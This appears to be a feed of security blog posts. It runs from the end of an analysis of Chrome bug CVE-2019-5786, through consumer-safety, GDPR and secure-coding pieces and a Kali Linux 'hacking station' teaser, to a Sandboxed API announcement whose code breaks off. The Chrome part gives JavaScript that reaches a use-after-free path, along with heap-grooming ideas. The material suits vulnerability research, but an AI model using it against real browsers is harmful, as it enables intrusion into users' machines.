In the unpatched version, instead of calling ArrayBuffer::Create, the code uses the return value of ArrayBufferBuilder::ToArrayBuffer() (from third_party/blink/renderer/platform/wtf/typed_arrays/array_buffer_builder.cc):


Here is yet another rabbit hole to dive into (but we will keep it high level). Depending on the value of bytes_used_, the function will either return its own buffer, or a sliced copy of it (i.e. a new, smaller ArrayBuffer that contains a copy of the data).


To sum up what we have so far: every code path we have looked at returns a copy of the data instead of the actual buffer, except in the unpatched code when the buffer we try to access is `fully used` (per the comment in ArrayBufferBuilder::ToArrayBuffer()).
Because of the implementation of the FileReaderLoader object, buffer_->ByteLength() is the pre-allocated size of the buffer, which corresponds to the size of the data we want to load (this will be relevant later on).
If we now recall the commit message and the bad scenario it describes, the only way to trigger the bug appears to be calling ArrayBufferBuilder::ToArrayBuffer() multiple times after the data has been fully received but before finished_loading is set to true.

To wrap up this part of the code review, let us look at the behavior of the DOMArrayBuffer::Create function that is called in both the patched and unpatched cases; the case of interest to us is the call DOMArrayBuffer::Create(raw_data_->ToArrayBuffer());

From third_party/blink/renderer/core/typed_arrays/dom_array_buffer.h:


Something interesting to look at is the use of std::move, which casts its argument to an rvalue so that the receiving object can take over its resources; in effect, ownership is transferred.
For instance, in the following snippet:

`b` takes ownership of what belonged to `a` (`b` now contains “hello”) and `a` is left in a valid but unspecified state (the C++11 standard describes this in more precise terms).

In our current situation, what is going on is somewhat confusing [6a] [6b]. The object returned by ArrayBufferBuilder::ToArrayBuffer() is already a scoped_refptr<ArrayBuffer>. I believe the meaning of all this is that calling ToArrayBuffer() increases the refcount on the ArrayBuffer by one, and std::move takes ownership of that scoped_refptr instance (as opposed to the one owned by the ArrayBufferBuilder). Calling ToArrayBuffer() 10 times will increase the refcount by 10, but all the return values will be valid (unlike the toy example with the strings `a` and `b` above, where operating on `a` would result in unexpected behavior).
This rules out the obvious use-after-free in which the buffer_ object of the ArrayBufferBuilder would get corrupted by calling ToArrayBuffer() multiple times during the sweet spot described above.

2.2 FileReader API

Another angle of approach for figuring out how to exploit this bug is to look at the API that is available to us from JavaScript and see if we can come up with a way to reach the sweet spot we were looking at.

We can get all the information we want from the Mozilla web docs [7]. Our options are fairly limited: we can call the readAsXXX functions on either a Blob or a File, we can abort the read, and there are a handful of events we can register callbacks on (onloadstart, onprogress, onloadend, …).

The onprogress event sounds like the most interesting one, as it is fired while data is loading but before loading is finished. If we look at the FileReader.cc source file, we can see that the logic behind this event is to fire roughly every 50ms while data is being received. Let us have a look at how this behaves in a real system…

3. Testing in a web-browser

3.1 Getting started

The first thing we want to do is download a vulnerable version of the code. There are some useful resources out there [8] where one can download older builds rather than having to build them yourself.

Something interesting to note is that there is also a separate zip file with `syms` in its name that you can download to get debug symbols for the build (in the form of .pdb files). Debuggers and disassemblers can import those symbols, which will make your life much easier as every function will be labelled with its actual name from the source code.

3.2 Attaching a debugger

Chromium is a complex piece of software in which multiple processes communicate with each other, which makes debugging harder. The most efficient way to debug it is to start Chromium normally and then attach the debugger to the process you want to inspect. The code we are debugging runs in the renderer process, and the functions we were looking at are exposed by chrome_child.dll (those details were found by trial and error: attaching to each Chrome process in turn and looking for function names of interest).


If you want to import symbols in x64dbg, a possible solution is to go in the Symbol pane, right click on the .dll/.exe you want to import the symbols for and select Download symbols. It may fail if the symbol server setting is not configured properly, but it will still create the directory structure in x64dbg’s `symbols` directory, where you can put the .pdb files you’ve previously downloaded.

3.3 Looking for the exploitable code path

Now that we have downloaded an unpatched version of Chromium and know how to attach a debugger, let us write some JavaScript to see if we can hit the code path we care about.


To sum up what is going on here: we create a Blob that we pass to the FileReader. We register a callback on the progress event and, when the event fires, we access the reader’s result multiple times. We have seen previously that the data needs to be fully loaded (that is why we check the size of the buffer), and if we get multiple DOMArrayBuffers with the same backing ArrayBuffer, they should appear to JavaScript as two separate objects (hence the equality test). Finally, to double-check that we indeed have two different objects backed by the same buffer, we create views to modify the underlying data and verify that modifying one modifies the other as well.

There is an unfortunate issue that we had not foreseen: the progress event is not fired frequently, so we have to load a really large array in order to force the load to take some time and trigger the event multiple times. There might be better ways of doing so (maybe the Google bug report will reveal one!), but all our attempts to create a slow-loading object failed (using a Proxy, extending the Blob class…). The loading is tied to a Mojo pipe, so exposing MojoJS could be a way of having more control as well, but it seems unrealistic in an attacker scenario as this is the entry point of the attack. See [9] for an example of that approach.
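As an added example (this is not the write-up’s own harness, which is not reproduced on the page), the following JavaScript reaches the window described above and checks for the aliasing. The `viewsAlias` helper is the “modify through one view, observe through the other” test and runs anywhere; `probeFileReaderAliasing` needs a real browser page and only reports hits on an unpatched Chromium (older than 72.0.3626.121). The blob size passed to it is an assumption; it must be large enough for several progress events to fire.

```javascript
// Added example (not the write-up's own harness): reach the partial-load window
// of FileReader.result and test whether two reads of `result` are distinct
// DOMArrayBuffer objects sharing one backing store. Only `viewsAlias` and
// `fullyReceived` run outside a browser; the probe needs an unpatched Chromium
// (older than 72.0.3626.121). The blob size is an assumption: it has to be
// large enough for several progress events to fire during the load.

// Do two typed-array views write through to the same memory? Flips one byte
// through `a`, looks for it through `b`, then restores the original value.
function viewsAlias(a, b) {
  if (a.length === 0 || b.length === 0) return false;
  const saved = a[0];
  a[0] = saved ^ 0xff;
  const aliased = b[0] === (saved ^ 0xff);
  a[0] = saved;
  return aliased;
}

// True once the temporary DOMArrayBuffer covers the whole blob: in the
// unpatched ToArrayBuffer() that is the "fully used" path that hands out the
// builder's own buffer instead of a sliced copy.
function fullyReceived(result, size) {
  return result instanceof ArrayBuffer && result.byteLength === size;
}

// Browser-only probe: resolves with the number of progress events in which two
// reads of reader.result were different objects backed by the same memory.
// A patched build resolves to 0.
function probeFileReaderAliasing(sizeBytes) {
  return new Promise((resolve, reject) => {
    if (typeof FileReader === 'undefined' || typeof Blob === 'undefined') {
      reject(new Error('FileReader/Blob unavailable: run this in a browser page'));
      return;
    }
    const blob = new Blob([new Uint8Array(sizeBytes).fill(0x41)]); // 'AAAA...'
    const reader = new FileReader();
    let hits = 0;
    reader.onprogress = () => {
      const first = reader.result;                    // each access builds a new DOMArrayBuffer
      if (!fullyReceived(first, sizeBytes)) return;   // still a sliced copy, keep waiting
      const second = reader.result;
      if (first !== second && viewsAlias(new Uint8Array(first), new Uint8Array(second))) hits++;
    };
    reader.onloadend = () => resolve(hits);
    reader.onerror = () => reject(reader.error);
    reader.readAsArrayBuffer(blob);
  });
}

// In a browser console: probeFileReaderAliasing(256 * 1024 * 1024).then(console.log);
```

On a patched build every progress-time read is a fresh copy, so `viewsAlias` returns false and the promise resolves to 0; a vulnerable build returns a count of the reads that handed out the builder’s own buffer twice. The helper restores the byte it flips, so the probe does not disturb the data you later inspect in the debugger.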

3.4 Causing a crash

So, now that we have figured out how to reach the vulnerable code path, how do we exploit it? This was definitely the hardest question to answer, and this section is meant to share the process we followed to find an answer to that question.

We have seen that the underlying ArrayBuffer is refcounted, so it is unlikely we’ll be able to magically free it by simply having some of the DOMArrayBuffers we’ve obtained garbage collected. Overflowing the refcount sounds like a fun idea, but if we try by hand to modify the refcount value to be near its maximum value (via x64dbg) and see what happens… well, the process crashes. Finally, we cannot do much with those ArrayBuffers; we can change their content but not their size, nor can we manually free them…
Not being familiar enough with the codebase, the best approach then is to pore through various bug reports that mention use-after-free, ArrayBuffer, etc., and see what people did or talked about. There must be some assumption somewhere that a DOMArrayBuffer owns its underlying memory, and that is an assumption we know we are breaking.
After some searching, we started to find some interesting comments like this one [10a] and this one [10b]. Those two links talk about various situations where a DOMArrayBuffer gets externalized, transferred and neutered. We are not familiar with those terms, but from the context it sounds like when this happens, the ownership of the memory is transferred to somebody else. That sounds pretty perfect for us, as we want the underlying buffer to be freed (we are hunting for a use-after-free).
The use-after-free in WebAudio shows us how to get our ArrayBuffer “transferred”, so let’s try that!

 

And as seen in the debugger:

The memory being dereferenced is in ECX (we also have EAX == 0 but that’s because we’re looking at the first item in the view). The address looks valid, but it isn’t. ECX contains the address where the raw data of our buffer was stored (the AAAAA…) but because it got freed, the system unmapped the pages that held it, causing the access violation (we’re trying to access an unmapped memory address). We reached the use-after-free we were looking for!

4. Exploit considerations and next steps

4.1 Exploit

It is not the point of this document to illustrate how to push beyond the use-after-free to get full code execution (in fact Exodus have released a blog and a working exploit roughly coinciding with the timing of this publication). However, there are some interesting comments to be made.
Due to the way we are triggering the use-after-free, we end up with a very large buffer being freed. The usual way to exploit a use-after-free is to get a new object allocated on top of the freed region to create some sort of confusion. Here, we are freeing the raw memory that backs the data of our ArrayBuffer. That is great because we can read/write over a large region. Yet a problem with this approach is that, because the memory region is really large, there is no single object that would just fit in. If we had a small buffer, we could create lots of objects of that specific size and hope one would be allocated there. Here it is harder, because we need to wait until that memory is reclaimed by the heap for unrelated objects. On Windows 10 64-bit, it is hard because of how random allocations are and the entropy available for random addresses. On Windows 7 32-bit, it is much easier as the address space is much smaller and the heap allocation is more deterministic. Allocating 10k objects might be enough to have some metadata land within the address range we control.
The second interesting aspect is that, because we are going to dereference a region that has been unmapped, if the 10k allocations mentioned above fail to place at least one object in the area we control, then we are out of luck; we will get an access violation and the process will die. There are ways to make this step more reliable, such as the iframe method described here [11].
An example on how to move on if one can corrupt the metadata of a JavaScript object can be found here [12].

4.2 Next step

Once an attacker has gained code execution inside the renderer process, they are still limited by the sandbox. In the exploit found in the wild, the attacker used a second 0-day that targeted the Windows kernel to escape the sandbox. A write-up describing that exploit was recently released by 360CoreSec here [13].

5. Conclusion

By looking at the commit that fixed the bug and hunting down hints and similar fixes, we were able to recover the likely path towards exploitation. Once again, we can see that the modern mitigations introduced in later versions of Windows make life much harder for attackers, and we should celebrate those wins from the defensive side. Also, Google is extremely efficient and aggressive in its patching strategy, and most of its user base will have already seamlessly updated to the latest version of Chrome.

 

Links

[1] https://chromereleases.googleblog.com/2019/03/stable-channel-update-for-desktop.html
[2] https://security.googleblog.com/2019/03/disclosing-vulnerabilities-to-protect.html
[2b] https://bugs.chromium.org/p/chromium/issues/detail?id=936448
[3] https://chromium.googlesource.com/chromium/src/+log/72.0.3626.119..72.0.3626.121?pretty=fuller
[3b] https://github.com/chromium/chromium/commit/ba9748e78ec7e9c0d594e7edf7b2c07ea2a90449
[4a] https://github.com/chromium/chromium/blob/17cc212565230c962c1f5d036bab27fe800909f9/third_party/blink/renderer/core/fileapi/file_reader_loader.cc
[4b] https://github.com/chromium/chromium/blob/75ab588a6055a19d23564ef27532349797ad454d/third_party/blink/renderer/core/fileapi/file_reader_loader.cc
[5] https://www.chromium.org/developers/smart-pointer-guidelines
[6a] https://chromium.googlesource.com/chromium/src/+/lkgr/styleguide/c++/c++.md#object-ownership-and-calling-conventions
[6b] https://www.chromium.org/rvalue-references
[7] https://developer.mozilla.org/en-US/docs/Web/API/FileReader
[8] https://commondatastorage.googleapis.com/chromium-browser-snapshots/index.html?prefix=Win_x64/612439/
[9] https://www.exploit-db.com/exploits/46475
[10a] https://bugs.chromium.org/p/v8/issues/detail?id=2802
[10b] https://bugs.chromium.org/p/chromium/issues/detail?id=761801
[11] https://blog.exodusintel.com/2019/01/22/exploiting-the-magellan-bug-on-64-bit-chrome-desktop/
[12] https://halbecaf.com/2017/05/24/exploiting-a-v8-oob-write/
[13] http://blogs.360.cn/post/RootCause_CVE-2019-0808_EN.html

The post Analysis of a Chrome Zero Day: CVE-2019-5786 appeared first on McAfee Blogs.

Code makes the world go ‘round. Well, code and love. So love your code.

Your code is powerful, clever and elegant—but is it secure?

More than ever, code makes the world go ‘round. From smart home thermostats to critical infrastructure to integrated clinical environments in hospitals, code runs so much of what touches our lives every day. Sometimes we are explicitly aware that we are interacting with software but increasingly we are not—code runs quietly amid the people, objects and experiences that shape our lives and the broader world we share.

Your code is powerful and so are you: the quality and security of the code that you put out into the world ripples out to affect individuals, organizations, nations. When you consider the reach of your code it is clear that to deliver quality code you must deliver secure code.

As the pressure to deliver software to the market quickly has increased so too have the scope and severity of the risks posed by insecure applications. For example, 85% of all applications we scanned in a recent 12-month period had at least one vulnerability in them, and more than 13% had a critical severity flaw. The most common flaws found are some of the most easily exploited: SQL injection flaws are present in nearly one in three applications and cross-site scripting vulnerabilities are present in nearly half of applications tested.

It’s not all gloom and doom, we promise. Here’s some sunshine for you: writing secure code does not take longer than writing insecure code. Sit with that idea for a few seconds. This assertion might seem counterintuitive as you consider the pressure to ship code more and more quickly, but taking the time to address security early and often in the development process will get you to shipping quality code faster. A minor flaw left unaddressed early in the software development lifecycle becomes a tangled mess the longer it persists. Unraveling that tangle is neither simple nor quickly done. Finding and fixing flaws early on is an easier path for teams working hard to deliver functional, high quality code to the market.

But where to start? If writing secure code seems like a steep climb, you are not alone. Many developers—most developers in fact—are not introduced to secure coding principles while they are learning to build software.

More good news: developers of all stripes, whenever and however they started coding, have this in common: intellectual curiosity. You are the tinkerers, problem-solvers and lifelong learners who started with your first line of code and have never stopped wondering, perfecting and learning. Coding is a craft and your years of coding have all been about mastering something new and then doing that again and again and again—across new languages, frameworks and approaches to development.

For many developers writing secure code is brand new and yet it has undeniably become part of the process of mastering your craft. A first step is educating yourself on basic secure coding principles and beginning to put these principles into practice every day. In doing so you join developers the world over who are tinkering, learning and growing—united by their shared commitment to put the best possible code out into the world. As you find and fix flaws, you will be learning as you go and writing more and more secure code. Along the way you will notice that you are introducing fewer and fewer flaws into your code to begin with. Fewer messy tangles to pull apart later on. And your team will benefit too. As you build your security knowledge, you will be helping your peers by spotting flaws during code reviews when they are easier to fix. You will be measurably shifting the security of your applications just by starting where you are.

So wherever you are in your own learning process, we offer this toolkit of resources to help you and your team along your path to writing amazing code.

  • Best practices for secure coding
  • How to secure your DevOps environments
  • How to combat the most common software vulnerabilities
  • What developers don’t know about security but should

Secure Coding Best Practices Handbook

What Developers Don’t Know About Security But Should

Whitepapers:

5 Principles for Securing DevOps

Vulnerability Decoder Infosheets:

Insecure Crypto

Encapsulation

Race Condition

Improper Error Handling

Broken Access Controls

Cross-Site Scripting

Insecure Open Source Components

Additional resources

Out of our close work with developers over many years has grown a range of developer-focused resources for learning to code more securely. Beyond the secure coding toolkit, we offer many learning resources—developer training, remediation coaching, the Veracode Community and Greenlight, Veracode’s IDE- or CI-integrated continuous flaw feedback and secure coding education solution.

How Online Scams Drive College Basketball Fans Mad

Sports fans everywhere look forward to mid-March for the NCAA men’s college basketball tournament. However, it’s not just college basketball fans that look forward to this time of year. Cybercriminals use March to launch malicious campaigns in the hopes of gaining access to personal information from unsuspecting fans. Let’s take a look at the most popular techniques cybercriminals use to gain access to passwords and financial information, as well as encourage victims to click on suspicious links.

Online betting provides cybercriminals with a wealth of opportunities to steal personal and financial information from users looking to engage with the games while potentially making a few extra bucks. The American Gaming Association (AGA) estimates that consumers will wager $8.5 billion on the 2019 NCAA men’s basketball tournament. What many users don’t realize is that online pools that ask for your personal and credit card information create a perfect opportunity for cybercriminals to take advantage of unsuspecting fans.

In addition to online betting scams, users should also be on the lookout for malicious streaming sites. As fewer and fewer homes have cable, many users turn to online streaming sites to keep up with all of the games. However, even seemingly reputable sites could contain malicious phishing links. If a streaming site asks you to download a “player” to watch the games, there’s a possibility that you could end up with nasty malware on your computer.

Ticket scammers are also on the prowl during March, distributing fake tickets on classified sites they’ve designed to look just like the real thing. Of course, these fake tickets all have the same barcode. With these scams floating around the internet, users looking for cheap tickets to the games may be more susceptible to buying counterfeit tickets if they are just looking for the best deal online and are too hasty in their purchase.

So, if you’re a college basketball fan hoping to partake in this exciting month – what next? In order to enjoy the fun that comes with the NCAA tournament without the risk of cyberthreats, check out the following tips to help you box out cybercriminals this March:

  • Verify the legitimacy of gambling sites. Before creating a new account or providing any personal information on an online gambling website, poke around and look for information any legitimate site would have. Most gambling sites will have information about the site rules (i.e., age requirements) and contact information. If you can’t find such information, you’re better off not using the site.
  • Be leery of free streaming websites. The content on some of these free streaming websites is likely stolen and hosted in a suspicious manner, and it may also contain malware. So, if you’re going to watch the games online, it’s best to purchase a subscription from a legitimate streaming service.
  • Stay cautious on popular sports sites and apps. Cybercriminals know that millions of loyal fans will be logging on to popular sports sites and apps to stay updated on the scores. Be careful when visiting these sites that you’re not clicking on any suspicious ads or links that could contain malware. If you see an offer that interests you in an online ad, you’re better off going directly to the website of the company displaying the ad rather than clicking on the ad from the sports site or app.
  • Beware of online ticket scams. Scammers will be looking to steal payment information from fans in search of last-minute tickets to the games. To avoid this, it’s best to buy directly from the venue whenever possible. If you decide to purchase from a reseller, make sure to do your research and only buy from trusted vendors.
  • Use comprehensive security software. Using a tool like McAfee WebAdvisor can help you avoid dangerous websites and links, and will warn you in the event that you do accidentally click on something malicious. It will provide visual warnings if you’re about to go to a suspicious site.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post How Online Scams Drive College Basketball Fans Mad appeared first on McAfee Blogs.

When is it fair to infer?

While the GDPR framework is robust in many respects, it struggles to provide adequate protection against the emerging risks associated with inferred data (sometimes called derived data, profiling data, or inferential data). Inferred data pose potentially significant risks in terms of privacy and/or discrimination, yet they would seem to receive the least protection of the personal data types prescribed by GDPR. Defined as assumptions or predictions about future behaviour, inferred data cannot be verified at the time of decision-making. Consequently, data subjects are often unable to predict, understand or refute these inferences, whilst their privacy rights, identity and reputation are impacted.

Reaching dangerous conclusions

Numerous applications drawing potentially troubling inferences have emerged; Facebook is reported to be able to infer protected attributes such as sexual orientation and race, as well as political opinions and the likelihood of a data subject attempting suicide. Facebook data has also been used by third parties to decide on loan eligibility, to infer political leniencies, to predict views on social issues such as abortion, and to determine susceptibility to depression. Google has attempted to predict flu outbreaks, other diseases and medical outcomes. Microsoft can predict Parkinson’s and Alzheimer’s from search engine interactions. Target can predict pregnancy from purchase history, users’ satisfaction can be determined by mouse tracking, and China infers a social credit scoring system.

What protections does GDPR offer for inferred data?

The European Data Protection Board (EDPB) notes that both verifiable and unverifiable inferences are classified as personal data (for instance, the outcome of a medical assessment regarding a user’s health, or a risk management profile). However it is unclear whether the reasoning and processes that led to the inference are similarly classified. If inferences are deemed to be personal data, should the data protection rights enshrined in GDPR also equally apply?

The data subject’s right to be informed, right to rectification, right to object to processing, and right to portability are significantly reduced when data is not ‘provided by the data subject’. For example, the EDPB note (in their guidelines on the right to data portability) that “though such data may be part of a profile kept by a data controller and are inferred or derived from the analysis of data provided by the data subject, these data will typically not be considered as ‘provided by the data subject’ and thus will not be within scope of this new right”.

The data subject, however, can still exercise their “right to obtain from the controller confirmation as to whether or not personal data concerning the data subject is being processed, and, where that is the case, access to the personal data”. The data subject also has the right to information about “the existence of automated decision-making, including profiling (Article 22(1), (4)), and meaningful information about the logic involved, as well as the significance and consequences of such processing” (Article 15). However, the data subject must actively make such an access request, and if the organisation does not provide the data, how will the data subject know that derived or inferred data is missing from the response to their access request?

A data subject can also object to direct marketing based on profiling and/or have it stopped, however there is no obligation on the controller to inform the data subject that any profiling is taking place – “unless it produces legal or significant effects on the data subject”.

No answer just yet…

Addressing the challenges and tensions of inferred and derived data will necessitate further case law on the interpretation of “personal data”, particularly regarding interpretations of GDPR. Future case law on the meaning of “legal effects… or similarly significantly affects”, in the context of profiling, would also be helpful. It would also seem reasonable to suggest that, where possible, data subjects should be informed at the point of collection that data is derived by the organisation and for what purposes. If the data subject doesn’t know that an organisation uses their data to infer new data, the data subject cannot fully exercise their data subject rights, since they won’t know that such data exists.

In the meantime, it seems reasonable to suggest that inferred data which has been clearly communicated to the data subject, is benevolent in its intentions, and offers the data subject positive enhanced value, is ‘fair’.

The post When is it fair to infer? appeared first on BH Consulting.

Ghosts May Not Be Real but Trolls Are – Look Out for Social Media Trolls

The Cambridge Dictionary describes a troll as “an imaginary, either very large or very small creature in traditional Scandinavian stories, that has magical powers and lives in mountains or caves.”

If you have read your fairy tales, you would know that trolls are generally grotesque creatures that stay away from human habitation. They take pleasure in carrying out antisocial activities and causing people pain and mental suffering.

Those trolls are mythical, but the online trolls are very much real. These digital trolls use the anonymity offered by the net to stay hidden and cause disruption and harm through their malicious and negative comments. They share provocative, malicious content and delight in fomenting unrest. If the victim takes the comments personally, it can leave them emotionally disturbed.

Why do people troll?

Why do people troll? Why do they want to insult, abuse, criticize, hurt and spread negativity? There are many studies available online that offer detailed analysis of how a troll’s mind works. However, we won’t go into such details. For our convenience and easy understanding, it will suffice to say that trolling may be the result of an individual’s background, low empathy levels, anger, frustration, jealousy, sadness and/or bitterness.

  • Low empathy: There are people who have less empathy or sensitivity and often find grim or disturbing situations funny. They will, for example, not think twice about posting a joke on a social media thread where everyone is offering condolences on the demise of a loved one. They may see nothing wrong in it; rather, it may give them a laugh.
  • Inflexible attitude: Some people find it difficult to accept that others too can have their individual viewpoints, instinctively target people with different opinions as enemies, and make it their mission to abuse them, as if to prove that they are wrong. They hamper freedom of speech online, for they try to deter other users from sharing their personal opinions.
  • Revenge: Some go on a rampage to seek revenge for the ‘wrong’ done to them or someone else.

The anonymity provided by the net enables many cowardly people to feel strong by attacking others and give vent to their emotions online.

How do you identify trolls?

Easy. They are the rabble rousers, the ones who have nothing positive to contribute but are only out to disrupt, disturb and upset you. Their posts may vary from personal comments on your photo, satirical outbursts on your blogs or videos or direct attacks on your person, to out-of-context malicious remarks in an ongoing discussion. They would definitely be using a false bio and either no profile pic or a false one.

What do you do if you are trolled?

  • Avoid feeding them – they thrive on your emotional upheaval and vituperative responses. The smart thing to do is to neither acknowledge their comments nor respond to them. Nothing is as off-putting as being ignored.
  • Keep records and block – If the trolling continues, keep records, block the troll’s account and report it to the platform. Let your friends know about the account too.
  • Consider keeping commenting off on your YouTube channel – you may also choose to delete negative comments.
  • Make amendments to posts – if factual or grammatical errors or an archaic style of writing your posts or blogs have brought out the trolls, consider apologizing for the errors and making revisions. Reply positively, thanking the troll for the feedback. You will take the wind out of the troll’s sails.
  • Don’t take it to heart – adults may use humour to counter trolls online, but it may not be easy for teens to keep emotions aside and reply to abusive comments lightly. So, it’s best to ignore.

As a digital parent, you may already be aware of trolls and the emotional havoc they can cause. You want to protect your kids from their attacks when they go online. At the same time, you need to explain to them why trolling is wrong and sometimes funny isn’t funny at all but may be hurtful and nasty.

How to ensure your kids know it’s wrong to troll?

  • Good manners: Whether online or off it, there is no substitute to good manners and etiquette. Ensure your kids feel happy and secure at home. Model the kind of behavior you expect from them and reward good manners with appreciation.
  • Empathy: The world runs on kindness and empathy. Reinforce empathy right from childhood. They need to understand that there are all kinds of people and each one is special in some way. Help them grow up to be generous, tolerant and broad-minded people.
  • Positivity: A child with a positive outlook and sunny disposition is most unlikely to be rude and deliberately mean online. Lay stress on being positive, whatever the situation may be.
  • Monitoring: It is recommended that parents monitor the conversations kids have online. Avoid participating in their conversations or taking to task those who may be bullying or trolling them, for though this will delight the troll, it will be embarrassing for the child. Instead, have discussions on how he/she plans to handle it and let him/her tackle the issue.
  • Last but not least, ensure all your devices are installed with licensed comprehensive security software that offers a parental controls feature. This will allow you to monitor activities remotely, though you should keep your child informed that you are doing so.

One last word: we cannot make trolls vanish, but we can empower our kids to vanquish them.

The post Ghosts May Not Be Real but Trolls Are – Look Out for Social Media Trolls appeared first on McAfee Blogs.

Kali Linux Micro Hacking Station Raspberry Pi

Raspberry Pi is a small, pocket-sized, low-cost computer. Today we will be setting up Kali Linux on Raspberry Pi. We can use Kali Linux on Raspberry Pi to hack WiFi passwords, launch various social engineering attacks, set up rogue access points and a wide range […]

The post Kali Linux Micro Hacking Station Raspberry Pi appeared first on HackingVision.

Open-sourcing Sandboxed API



Many software projects process data which is externally generated, and thus potentially untrusted. For example, this could be the conversion of user-provided picture files into different formats, or even executing user-generated software code.
When a software library parsing such data is sufficiently complex, it might fall victim to certain types of security vulnerabilities: memory corruption bugs or certain other types of problems related to the parsing logic (e.g. path traversal issues). Those vulnerabilities can have serious security implications.

In order to mitigate those problems, developers frequently employ software isolation methods, a process commonly referred to as sandboxing. By using sandboxing methods, developers make sure that only resources (files, networking connections and other operating system resources) which are deemed necessary are accessible to the code involved in parsing user-generated content. In the worst-case scenario, when potential attackers gain remote code execution rights within the scope of a software project, a sandboxing technique can contain them, protecting the rest of the software infrastructure.

Sandboxing techniques must be highly resistant to attacks and sufficiently protect the rest of the operating system, yet must be sufficiently easy to use for software developers. Many popular software containment tools might not sufficiently isolate the rest of the OS, and those which do might require a time-consuming redefinition of security boundaries for each and every project that should be sandboxed.

Sandbox once, use anywhere

To help with this task, we are open-sourcing our battle-tested project called Sandboxed API. Sandboxed API makes it possible to create security policies for individual software libraries. This concept allows creating reusable and secure implementations of functionality residing within popular software libraries, yet is granular enough to protect the rest of the software infrastructure that uses them.

As Sandboxed API serves the purpose of accessing individual software functions inside a sandboxed library, we are also making publicly available our core sandboxing project, Sandbox2. This is now part of Sandboxed API and provides the underlying sandboxing primitives. It can also be used standalone to isolate arbitrary Linux processes, but is considered a lower-level API.

Overview

Sandboxed API is currently implemented for software libraries written in the C programming language (or providing C bindings), though we might add support for more programming runtimes in the future.

From a high-level perspective, Sandboxed API separates the library to be sandboxed and its callers into two separate OS processes: the host binary and the sandboxee. Actual library calls are then marshalled by an API object on the host side and sent via interprocess communication to the sandboxee, where an RPC stub unmarshals them and forwards the calls to the original library.

Both the API object (SAPI object) and the RPC stub are provided by the project, with the former being auto-generated by an interface generator. Users just need to provide a sandbox policy: the set of system calls that the underlying library is allowed to make, as well as the resources it is allowed to access and use. Once ready, a library based on Sandboxed API can easily be reused in other projects.

The resulting API of the SAPI object is similar to the one of the original library. For example, when using zlib, the popular compression library, a code snippet like this compresses a chunk of data (error handling omitted for brevity):


#include <cstdint>
#include <string>
#include <zlib.h>

// CHECK() is the project's fatal assertion macro; other error handling is omitted.
void Compress(const std::string& chunk, std::string* out) {
 z_stream zst{};
 constexpr char kZlibVersion[] = "1.2.11";
 CHECK(deflateInit_(&zst, /*level=*/4, kZlibVersion, sizeof(zst)) == Z_OK);

 zst.avail_in = chunk.size();
 // next_in is non-const in zlib's default configuration, hence the const_cast.
 zst.next_in = reinterpret_cast<uint8_t*>(const_cast<char*>(chunk.data()));
 zst.avail_out = out->size();
 zst.next_out = reinterpret_cast<uint8_t*>(&(*out)[0]);
 CHECK(deflate(&zst, Z_FINISH) != Z_STREAM_ERROR);
 out->resize(zst.total_out);  // bytes actually produced, not the space left over

 deflateEnd(&zst);
}


Using Sandboxed API, this becomes:

// Same operation, but zlib runs in a separate sandboxed process and the host
// calls it through the generated ZlibApi. Memory the library reads or writes
// is wrapped in sapi::v::* types and copied to and from the sandboxee.
void CompressSapi(const std::string& chunk, std::string* out) {
 sapi::Sandbox sandbox(sapi::zlib::zlib_sapi_embed_create());
 CHECK(sandbox.Init().ok());
 sapi::zlib::ZlibApi api(&sandbox);

 // Host-backed buffers; Allocate() reserves matching space in the sandboxee.
 sapi::v::Array<uint8_t> s_chunk(&chunk[0], chunk.size());
 sapi::v::Array<uint8_t> s_out(&(*out)[0], out->size());
 CHECK(sandbox.Allocate(&s_chunk).ok() && sandbox.Allocate(&s_out).ok());
 sapi::v::Struct<sapi::zlib::z_stream> s_zst;

 constexpr char kZlibVersion[] = "1.2.11";
 sapi::v::Array<char> s_version(kZlibVersion, ABSL_ARRAYSIZE(kZlibVersion));
 // PtrBoth(): copy the struct in before the call and back out afterwards;
 // PtrBefore(): copy in only.
 CHECK(api.deflateInit_(s_zst.PtrBoth(), /*level=*/4, s_version.PtrBefore(),
                        sizeof(sapi::zlib::z_stream)).ValueOrDie() == Z_OK);

 CHECK(sandbox.TransferToSandboxee(&s_chunk).ok());
 // The stream must point at the sandboxee's copies, hence GetRemote().
 s_zst.mutable_data()->avail_in = chunk.size();
 s_zst.mutable_data()->next_in = reinterpret_cast<uint8_t*>(s_chunk.GetRemote());
 s_zst.mutable_data()->avail_out = out->size();
 s_zst.mutable_data()->next_out = reinterpret_cast<uint8_t*>(s_out.GetRemote());
 CHECK(api.deflate(s_zst.PtrBoth(), Z_FINISH).ValueOrDie() != Z_STREAM_ERROR);
 CHECK(sandbox.TransferFromSandboxee(&s_out).ok());
 // total_out is the number of bytes produced; avail_out is only the space left.
 out->resize(s_zst.data().total_out);

 CHECK(api.deflateEnd(s_zst.PtrBoth()).ok());
}

As you can see, when using Sandboxed API there is extra code for setting up the sandbox itself and for transferring memory to and from the sandboxee, but other than that, the code flow stays the same.
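The sandbox policy mentioned above is, at its core, an allowlist of system calls. As an added example (not code from Sandboxed API, Sandbox2 or Google), the block below shows what such an allowlist looks like once expressed as a seccomp-bpf program, the kernel mechanism Sandbox2 uses to enforce it inside the sandboxee, plus a small evaluator so a policy can be unit-tested before it is ever installed; it assumes Linux on x86_64 (AUDIT_ARCH_X86_64 syscall numbering), and the allowed syscall list is constructed for illustration.

```cpp
// Added example, not Sandboxed API / Sandbox2 code: a syscall allowlist
// ("sandbox policy") as a seccomp-bpf program, with an evaluator for tests.
// Assumptions: Linux, x86_64 syscall numbers, at most 255 allowed syscalls.
#include <linux/audit.h>
#include <linux/filter.h>
#include <linux/seccomp.h>
#include <sys/prctl.h>
#include <sys/syscall.h>

#include <cstddef>
#include <cstdint>
#include <cstdio>
#include <vector>

#ifndef SECCOMP_RET_KILL_PROCESS
#define SECCOMP_RET_KILL_PROCESS SECCOMP_RET_KILL  // older kernel headers
#endif

// Program layout:
//   [load arch][arch == x86_64 ? skip 1 : fall through][KILL]
//   [load nr][JEQ allowed[0] -> ALLOW] ... [JEQ allowed[n-1] -> ALLOW][KILL][ALLOW]
// Anything not explicitly allowed, or arriving under a foreign ABI, is killed.
std::vector<sock_filter> BuildAllowlistFilter(const std::vector<uint32_t>& allowed) {
  std::vector<sock_filter> prog;
  prog.push_back(BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(seccomp_data, arch)));
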